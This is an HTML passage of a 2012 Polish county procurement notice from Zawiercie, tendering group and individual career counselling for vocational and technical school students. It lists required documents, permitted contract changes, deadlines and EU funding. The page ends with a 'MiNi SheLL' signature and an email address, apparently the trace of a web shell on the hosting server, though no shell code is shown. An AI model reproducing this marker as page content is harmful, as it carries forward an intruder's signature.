<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony formularz oferty - wg wzoru stanowiącego załącznik nr 1 do SIWZ
2)	Dokumenty określone w części VI SIWZ
3)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym Załącznik nr 4 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu) 
4)	Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest powołany.
5)	Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i podpisania umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 Ustawy Pzp Zamawiający przewiduje zmiany zawartej umowy w szczególności w następujących przypadkach: 
1)	ustawowej zmiany przepisów podatkowych,
2)	zmiany członków personelu kluczowego Wykonawcy i Zamawiającego na skutek wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja, odejście z pracy lub innych uniemożliwiających należyte wykonanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego na etapie wyboru oferty w postępowaniu przetargowym. 
3)	zmiana wynikać będzie z warunków narzuconych Zamawiającemu przez Urząd Marszałkowski.
4)	Zmiana podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego.
5)	Zmiana osób odpowiedzialnych za kontakty lub nadzór nad przedmiotem umowy.
6)	Zmiana nazw, siedziby stron umowy, numeru konta bankowego, innych danych ewidencyjnych - nie stanowiących zmiany stron umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Zawierciu
Wydział Gospodarki Mieniem i Zamówień Publicznych
ul. Sienkieiwcza 34
42-400 Zawiercie
III piętro, pokój 310.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2012 godzina 11:00, miejsce: Starostwo Powiatowe w Zawierciu
Wydział Gospodarki Mieniem i Zamówień Publicznych
ul. Sienkieiwcza 34
42-400 Zawiercie
III piętro, pokój 310.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia finansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach projektu pn. Mam zawód - mam pracę w regionie Priorytet IX Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć z doradztwa zawodowego dla uczniów szkół ponadgimnazjalnych Powiatu Zawierciańskiego  w roku szkolnym 2011/2012 - grupowego doradztwa zawodowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa grupowego doradztwa zawodowego na rzecz uczniów: 
-Zasadniczej Szkoły Zawodowej nr 2 wchodzącej w skład  Zespołu Szkół im. Józefa Bema w Zawierciu, 
-Zasadniczej Szkoły Zawodowej wchodzącej w skład Zespołu Szkół  w Szczekocinach,
-Zasadniczej Szkoły Zawodowej im. Jana Pawła II wchodzącej w skład  Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego w Żarnowcu, 
w  grupie liczącej około 20 osób (nie mniej niż 15 nie więcej niż 25), w godzinach nie pokrywających się z godzinami zajęć lekcyjnych tych uczniów. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych ( po 45 minut każda ) świadczone w okresie maksymalnie 3  tygodni licząc od  dnia podpisania umowy. 

-Technikum nr 1 wchodzącego w skład  Zespołu Szkół  im. X. Dunikowskiego                    w Zawierciu, 
-Technikum Nr 2 wchodzącego w skład Zespołu Szkół im. H. Kołłątaja w Zawierciu,
-Technikum Nr 5 wchodzącego w skład   Zespołu Szkół im. gen. J. Bema w Zawierciu,
-Technikum Nr 4 wchodzącego w skład  Zespołu Szkół im. St. Staszica  w Zawierciu, 
-Technikum  w Zespole Szkół im. prof. R. Gostkowskiego w Łazach, 
-Technikum  w Zespole Szkół Rolnicze Centrum Kształcenia Ustawicznego w Żarnowcu, 
-Technikum Nr 3 wchodzącego w skład  Zespołu Szkół im. O. Langego w Zawierciu,
-Technikum im. M. Kopernika wchodzącego w skład Zespołu Szkół  w Porębie
w grupie liczącej około 20 osób ( nie mniej niż 15 nie więcej niż 25 ), w godzinach nie pokrywających się z godzinami zajęć szkolnych tych uczniów. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 3 tygodni licząc od  dnia podpisania umowy. 
-Zasadniczej Szkoły Zawodowej Specjalnej nr 3 należącej do Zespołu Szkół Specjalnych  im. M. Grzegorzewskiej  w Zawierciu świadczonej w grupie liczącej około 14 osób w godzinach nie pokrywających się z godzinami zajęć szkolnych tych uczniów. Zakres zamówienia obejmuje grupowe doradztwo zawodowe na rzecz uczniów w wymiarze 24 godzin lekcyjnych (po 45 minut każda) świadczone w okresie maksymalnie 3  tygodni licząc od  dnia podpisania umowy

Łączna maksymalna liczba uczniów - 354.
Łączna maksymalna liczba grup - 18.
Liczba godzin konsultacji grupowych - 24 godziny na jedną grupę, ogółem maksymalnie 432 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie zajęć z doradztwa zawodowego dla uczniów szkół ponadgimnazjalnych Powiatu Zawierciańskiego w roku szkolnym 2011/2012 - usługa indywidualnego doradztwa zawodowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa indywidualnego doradztwa zawodowego na rzecz uczniów: 
-Zasadniczej Szkoły Zawodowej nr 2 należących do Zespołu Szkół im. Józefa Bema              w Zawierciu
-Zasadniczej Szkoły Zawodowej  należących do Zespołu Szkół  w Szczekocinach
-Zasadnicza Szkoła Zawodowa im. Jana Pawła II  należących do Zespół Szkół Rolnicze Centrum Kształcenia Ustawicznego  w Żarnowcu
-Technikum nr 1 należących do Zespół Szkół  im. X. Dunikowskiego   w Zawierciu 
-Technikum Nr 2 należących do Zespół Szkół  im. H. Kołłątaja  w Zawierciu 
-Technikum Nr 5 należących do  Zespół Szkół im. gen. J. Bema w Zawierciu
- Technikum Nr 4 należących do Zespół Szkół  im. St. Staszica w Zawierciu
- Technikum  należących do Zespół Szkół im. prof. R. Gostkowskiego w Łazach
-Technikum należących do Zespół Szkół Rolnicze Centrum Kształcenia Ustawicznego w Żarnowcu
-Technikum Nr 3 należących do Zespól Szkół im. O. Langego w Zawierciu 
-Technikum im. M. Kopernika należących do Zespół Szkół  w Porębie 
-Zasadniczej Szkoły Zawodowej Specjalnej nr 3 należącej do Zespołu Szkół Specjalnych  im. M. Grzegorzewskiej  w Zawierciu 


Łączna maksymalna liczba uczniów, którzy zostaną wyłonieni z konsultacji grupowych - 284.
Liczba godzin konsultacji indywidualnych - 9 godzin na jednego ucznia, ogółem maksymalna liczba godzin 2.556..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com